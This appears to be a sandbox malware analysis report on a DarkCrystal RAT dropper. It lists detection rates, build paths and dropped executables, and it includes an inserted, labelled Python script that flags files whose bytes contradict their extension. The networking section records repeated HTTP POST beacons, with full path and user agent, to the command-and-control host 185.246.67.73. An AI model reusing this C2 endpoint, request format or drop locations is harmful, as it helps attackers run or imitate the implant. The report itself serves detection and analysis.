Source: C:\Users\user\Desktop\dYYVtYJg.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\hwUMgwXg.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\jyGvCfcb.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\lNILRSep.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\nBMUCfZn.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\uAoBkxMT.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\wKKCkQsU.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\xqfrsuNN.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\yYksYVbT.log | ReversingLabs: Detection: 20%
Source: C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe | ReversingLabs: Detection: 63%
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | ReversingLabs: Detection: 63%
Source: gorkmTnChA.exe | ReversingLabs: Detection: 100%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Joe Sandbox ML: detected
Source: C:\Users\Default\Favorites\ApplicationFrameHost.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\BXyiPEuJ.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ClgJzaDG.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\AOGsABiv.log | Joe Sandbox ML: detected
Source: gorkmTnChA.exe | Joe Sandbox ML: detected
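Twenty of the scanner hits above are files named *.log on the user's Desktop, and the signature list separately notes that the sample drops files whose content does not match their extension. A quick triage check for that pattern is to compare each file's leading bytes with what its extension promises. The script below is an added example, not tooling from the report: it builds a constructed directory that mirrors the drop locations (a PE header behind a .log name, an encoded script in a root-level folder, a text file named .exe) and scans it. The magic table and the extension lists are this example's own assumptions, and a legitimate .log file can of course be binary, so hits are leads for a hash or scanner lookup rather than verdicts.

```python
"""Flag dropped files whose leading bytes contradict their extension.

Added example, not part of the report. The directory scanned here is built
from constructed bytes; MAGIC and the extension lists are assumptions.
"""
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple

MAGIC = [  # leading bytes -> content kind (assumed table, common formats only)
    (b"MZ", "pe"),                                     # PE executable / DLL
    (b"PK\x03\x04", "zip"),                            # zip, OOXML, jar
    (b"Rar!\x1a\x07", "rar"),
    (b"#@~^", "encoded-script"),                       # Windows Script Encoder (.vbe/.jse)
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),      # compound file: .msi, legacy Office
]
EXPECTED = {".exe": "pe", ".dll": "pe", ".scr": "pe", ".zip": "zip", ".rar": "rar",
            ".vbe": "encoded-script", ".jse": "encoded-script", ".msi": "ole"}
TEXT_EXTS = {".log", ".txt", ".bat", ".cmd", ".vbs", ".js", ".ini", ".cfg"}  # should never carry a MAGIC


def classify(head: bytes) -> Optional[str]:
    """Content kind from the first bytes, or None when no known magic matches."""
    for magic, kind in MAGIC:
        if head.startswith(magic):
            return kind
    return None


def mismatches(root: Path) -> List[Tuple[str, str, str]]:
    """(relative path, extension, detected kind) for every file whose content contradicts its name."""
    out: List[Tuple[str, str, str]] = []
    for p in root.rglob("*"):
        if not p.is_file():
            continue
        with p.open("rb") as fh:
            kind = classify(fh.read(8))
        ext = p.suffix.lower()
        rel = p.relative_to(root).as_posix()
        if ext in EXPECTED and kind != EXPECTED[ext]:        # e.g. text where a PE should be
            out.append((rel, ext, kind or "unknown"))
        elif ext in TEXT_EXTS and kind is not None:           # e.g. a PE behind a .log name
            out.append((rel, ext, kind))
    return sorted(out)


def demo() -> List[Tuple[str, str, str]]:
    """Build a constructed tree mirroring the report's drop locations and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "Desktop").mkdir()
        (root / "bridgeMonitorDhcpCommon").mkdir()
        # a PE header hidden behind a .log name (constructed bytes, not a real binary)
        (root / "Desktop" / "BXyiPEuJ.log").write_bytes(b"MZ\x90\x00" + b"\x00" * 60)
        (root / "Desktop" / "notes.log").write_text("2024-12-08 plain text\n")
        (root / "bridgeMonitorDhcpCommon" / "loader.vbe").write_bytes(b"#@~^AAAAAA==")  # consistent
        (root / "tool.exe").write_bytes(b"MZ" + b"\x00" * 62)                           # consistent
        (root / "fake.exe").write_text("echo not really a PE\n")
        return mismatches(root)


if __name__ == "__main__":
    for path, ext, kind in demo():
        print(f"{path}: extension {ext} but content looks like {kind}")
```

Only the first eight bytes are read per file, so the walk is cheap enough to run over an entire user profile; widen MAGIC with whatever formats matter in your environment before relying on it.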
Source: gorkmTnChA.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Directory created: C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Directory created: C:\Program Files\Uninstall Information\98135c31e34d63
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Directory created: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Directory created: C:\Program Files\Windows NT\Accessories\en-GB\98135c31e34d63
Source: unknown | HTTPS traffic detected: 172.67.184.109:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: gorkmTnChA.exe, DCRatBuild.exe.0.dr
Source: Binary string: wininet.pdb | source: SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732315055.000000000503A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\NetFXDev1\binaries\x86ret\bin\i386\VSSetup\Utils\boxstub.pdb | source: gorkmTnChA.exe
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb| | source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb | source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp, ShortcutFlags.dll.3.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb@ | source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp, ShortcutFlags.dll.3.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ResourceCleaner.pdb | source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb | source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp
Source: Binary string: wininet.pdbUGP | source: SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732315055.000000000503A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb | source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, MSI4DB5.tmp.7.dr, MSI44B9.tmp.3.dr, SandeLLoCHECKER_Installer.msi.3.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbl | source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, MSI4DB5.tmp.7.dr, MSI44B9.tmp.3.dr, SandeLLoCHECKER_Installer.msi.3.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb | source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, lzmaextractor.dll.3.dr, SandeLLoCHECKER_Installer.msi.3.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb | source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp, MSI4969.tmp.7.dr, MSI43FC.tmp.3.dr
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb | source: gorkmTnChA.exe
Source: Binary string: -C:\NetFXDev1\binaries\x86ret\bin\i386\VSSetup\Utils\boxstub.pdb | source: gorkmTnChA.exe
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: a:, b:, e:, f:, g:, h:, i:, j:, k:, l:, m:, n:, o:, p:, q:, r:, s:, t:, u:, v:, w:, x:, y:, z: (one entry per drive letter in the original report; drive enumeration)
Source: C:\Windows\System32\cmd.exe | File opened: c:
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function 1_2_0049A69B: FindFirstFileW, FindFirstFileW, GetLastError, FindNextFileW, GetLastError
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function 1_2_004AC220: SendDlgItemMessageW, EndDialog, GetDlgItem, SetFocus, SetDlgItemTextW, SendDlgItemMessageW, FindFirstFileW, FileTimeToLocalFileTime, FileTimeToSystemTime, GetTimeFormatW, GetDateFormatW, _swprintf, SetDlgItemTextW, FindClose, _swprintf, SetDlgItemTextW, SendDlgItemMessageW, FileTimeToLocalFileTime, FileTimeToSystemTime, GetTimeFormatW, GetDateFormatW, _swprintf, SetDlgItemTextW, _swprintf, SetDlgItemTextW
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function 3_2_009866E0: ReadFile, FindFirstFileW, CloseHandle, CreateEventW, CreateThread, WaitForSingleObject, GetExitCodeThread, CloseHandle (x8)
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function 3_2_00960050: _wcsrchr, FindFirstFileW, FindFirstFileW, FindFirstFileW, FindClose, FindClose
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function 3_2_009603E0: FindFirstFileW, GetFileAttributesW, SetFileAttributesW, GetFileAttributesW, FindNextFileW
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function 3_2_009444C0: GetShortPathNameW, FindFirstFileW, FindNextFileW, FindClose
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function 3_2_00988600: FindFirstFileW, FindClose
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function 3_2_009A4C70: FindFirstFileW, FindNextFileW, FindFirstFileW, FindNextFileW, FindNextFileW, FindClose
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function 3_2_00861A20: FindClose, PathIsUNCW, FindFirstFileW, GetFullPathNameW, GetFullPathNameW, FindClose, SetLastError, _wcsrchr, _wcsrchr, PathIsUNCW
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00861A20 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,PathIsUNCW,3_2_00861A20
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeCode function: 4x nop then jmp 00007FFD9B0322C6h11_2_00007FFD9B02086A
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh11_2_00007FFD9B1DD73D
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 4x nop then jmp 00007FFD9B0222C6h35_2_00007FFD9B0220BE
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 4x nop then jmp 00007FFD9B0122C6h36_2_00007FFD9B00086A
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh36_2_00007FFD9B1BD73D
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 4x nop then jmp 00007FFD9B909869h36_2_00007FFD9B909760
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 4x nop then jmp 00007FFD9B909869h36_2_00007FFD9B909770
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 4x nop then jmp 00007FFD9B0422C6h37_2_00007FFD9B03086A

                                    Networking

                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49743 -> 185.246.67.73:80
                                    Source: Network trafficSuricata IDS: 2829202 - Severity 1 - ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA : 192.168.2.4:49730 -> 172.67.184.109:443
                                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                    Source: Joe Sandbox ViewASN Name: THEFIRST-ASRU THEFIRST-ASRU
                                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 2580Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 1904Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: multipart/form-data; boundary=----QmKelCPMJNdPTxYb2WuoQ8QeKKO9Rja8qHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 143234Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 2584Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 1904Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 2584Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 2584Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 1904Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 2584Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 2584Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 2584Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 1904Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 2584Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 2584Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 2584Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 1904Expect: 100-continueConnection: Keep-Alive
